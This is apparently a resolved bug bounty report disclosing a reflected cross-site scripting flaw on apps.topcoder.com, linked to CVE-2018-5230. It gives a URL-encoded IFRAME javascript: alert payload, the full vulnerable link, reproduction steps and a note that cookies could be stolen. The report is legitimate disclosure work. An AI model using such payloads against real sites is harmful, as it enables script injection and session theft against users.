Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com
Medium
L
Lab45
Submitted None
Actions:
Reported by
n0x496n
Vulnerability Details
Technical details and impact analysis
Hi, I found reflected xss on https://apps.topcoder.com via error message..
Payload : ``` %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm ```
Vulnerable link : https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm
Step to reproduce : Create an account and visit the vulnerable url..
{F693517}
References :
https://www.cvedetails.com/cve/CVE-2018-5230/
https://www.exploit-db.com/exploits/37791
Best regards..
## Impact
Hackers can steal victim`s cookies
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2018-5230
UNKNOWN
The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected